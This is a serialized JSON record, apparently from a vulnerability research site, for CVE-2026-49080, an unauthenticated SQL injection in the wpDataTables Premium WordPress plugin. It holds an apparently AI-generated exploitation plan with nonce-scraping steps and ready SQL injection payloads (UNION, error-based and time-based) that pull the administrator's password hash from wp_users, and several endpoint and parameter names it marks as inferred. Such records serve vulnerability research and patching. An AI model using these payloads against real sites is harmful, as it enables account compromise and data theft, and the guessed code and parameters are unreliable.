[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fYhB-pAIZC-qclcd8CFvhkFt_azRgX2dQiVdGq4yPcIM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":9,"research_exploit_outline":28,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":32},"CVE-2026-49080","wpdatatables-premium-unauthenticated-sql-injection","wpDataTables (Premium) \u003C= 7.3.6 - Unauthenticated SQL Injection","The wpDataTables (Premium) plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 7.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","wpdatatables",null,"\u003C=7.3.6","7.4","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-06-08 00:00:00","2026-06-15 19:40:25",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fda533426-16bf-4eef-b113-c41b256952e6?source=api-prod",8,[],"researched",false,3,"This exploitation research plan targets **CVE-2026-49080**, an unauthenticated SQL Injection vulnerability in the **wpDataTables (Premium)** plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe vulnerability exists because the plugin fails to properly sanitize or parameterize user-supplied input before appending it to a SQL query within an AJAX handler accessible to unauthenticated users. Specifically, the vulnerability resides in the table data retrieval logic where filtering or sorting parameters are concatenated directly into the `WHERE` or `ORDER BY` clauses of the database query.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `get_wdtable` (inferred; common entry point for frontend table rendering)\n*   **Vulnerable Parameter:** `wdt_column_filter` or `columns[n][search][value]` (inferred)\n*   **Authentication:** None (via `wp_ajax_nopriv_` hook)\n*   **Preconditions:** At least one table must be created and published on a public page\u002Fpost via shortcode.\n\n### 3. Code Flow\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with the `action` parameter set to the vulnerable handler.\n2.  **Hook Registration:** The plugin registers the action:\n    `add_action( 'wp_ajax_nopriv_get_wdtable', array( 'WDT_AJAX_Handler', 'get_wdtable' ) );` (inferred)\n3.  **Input Processing:** The handler retrieves user input from `$_POST`.\n4.  **Vulnerable Sink:** The input is passed to a method (e.g., `WPDataTable::get_table_data`) that builds a SQL string using concatenation:\n    ```php\n    \u002F\u002F Inferred Vulnerable Logic\n    $filter = $_POST['wdt_column_filter'];\n    $sql = \"SELECT * FROM {$table_name} WHERE 1=1 AND (column_name LIKE '%$filter%')\";\n    $results = $wpdb->get_results($sql);\n    ```\n5.  **Execution:** `$wpdb->get_results()` executes the injected query.\n\n### 4. Nonce Acquisition Strategy\nwpDataTables Premium typically uses nonces for AJAX requests. Because this is an unauthenticated vulnerability, the nonce must be exposed on the frontend.\n\n1.  **Identify Shortcode:** The plugin uses `[wpdatatable id=1]`.\n2.  **Setup Page:** Create a page containing a table.\n    `wp post create --post_type=page --post_title=\"Data View\" --post_status=publish --post_content='[wpdatatable id=1]'`\n3.  **Navigate:** Use `browser_navigate` to visit the newly created page.\n4.  **Extract Nonce:** The plugin localizes its AJAX configuration. Use `browser_eval` to extract the nonce:\n    *   **Inferred JS Variable:** `window.wdt_ajax_object?.wdt_nonce` or `window.wpdatatables_frontend_config?.nonce`\n    *   **Action:** `const nonce = browser_eval(\"window.wdt_ajax_object.wdt_nonce\")`\n\n### 5. Exploitation Strategy\nWe will use a **UNION-based** SQL injection to extract the administrator's password hash from the `wp_users` table.\n\n1.  **Determine Column Count:** Incrementally test `ORDER BY` until an error occurs.\n    *   Payload: `1' ORDER BY 10-- -`\n2.  **Locate Reflection Point:** Inject a UNION SELECT with identifiable strings.\n    *   Payload: `1' UNION SELECT 'col1','col2','col3',...-- -`\n3.  **Data Extraction:**\n    *   **HTTP Request:** Use `http_request` tool.\n    *   **Method:** `POST`\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Body (URL-encoded):**\n        ```text\n        action=get_wdtable&\n        table_id=1&\n        wdt_nonce=[EXTRACTED_NONCE]&\n        wdt_column_filter=1' UNION SELECT 1,user_login,user_pass,4,5 FROM wp_users WHERE ID=1-- -\n        ```\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n\n### 6. Test Data Setup\n1.  **Create a Table:** Use the wpDataTables UI or a SQL import to ensure at least one table exists (ID 1).\n2.  **Publish Table:** Ensure the table is embedded in a public post using the `[wpdatatable id=1]` shortcode.\n3.  **Verify Admin:** Ensure an admin user exists (default ID 1).\n\n### 7. Expected Results\nThe HTTP response should be a JSON object containing the results of the SQL query. In a successful exploit, the `user_pass` (phpass hash) of the administrator will be present in one of the data columns in the response body.\n\n### 8. Verification Steps\n1.  **Retrieve Hash:** Capture the hash from the `http_request` response.\n2.  **CLI Verification:** Run `wp user get 1 --field=user_pass` via the terminal.\n3.  **Comparison:** Compare the hash retrieved via SQLi with the hash returned by WP-CLI. If they match, the exploitation is confirmed.\n\n### 9. Alternative Approaches\n*   **Error-Based Injection:** If the response does not reflect the data but errors are enabled, use `updatexml()` or `extractvalue()`:\n    *   Payload: `1' AND (SELECT 1 FROM (SELECT(updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1)))x)-- -`\n*   **Time-Based Blind:** If no data or errors are returned, use `SLEEP()`:\n    *   Payload: `1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))x)-- -`\n    *   Measurement: Monitor the `time_total` in the `http_request` response.","The wpDataTables (Premium) plugin for WordPress is vulnerable to unauthenticated SQL injection in versions up to and including 7.3.6. This vulnerability exists due to insufficient sanitization and lack of preparation on user-supplied parameters within the plugin's AJAX data retrieval logic, allowing attackers to append malicious SQL queries.","\u002F\u002F Inferred Vulnerable Logic from Research Plan\n$filter = $_POST['wdt_column_filter'];\n$sql = \"SELECT * FROM {$table_name} WHERE 1=1 AND (column_name LIKE '%$filter%')\";\n$results = $wpdb->get_results($sql);","To exploit this vulnerability, an attacker first locates a public page where a wpDataTable is rendered to extract a valid AJAX nonce from the frontend configuration. The attacker then sends a POST request to the admin-ajax.php endpoint with the action set to 'get_wdtable'. By supplying a UNION-based SQL injection payload in a filtering parameter such as 'wdt_column_filter', the attacker can extract sensitive information from the database, which is then reflected in the plugin's JSON response.","gemini-3-flash-preview","2026-06-26 02:35:02","2026-06-26 02:35:49",{"type":33,"vulnerable_version":34,"fixed_version":9,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":9,"fixed_zip":9,"all_tags":37},"plugin","6.5.1.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpdatatables\u002Ftags\u002F6.5.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpdatatables.6.5.1.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpdatatables\u002Ftags"]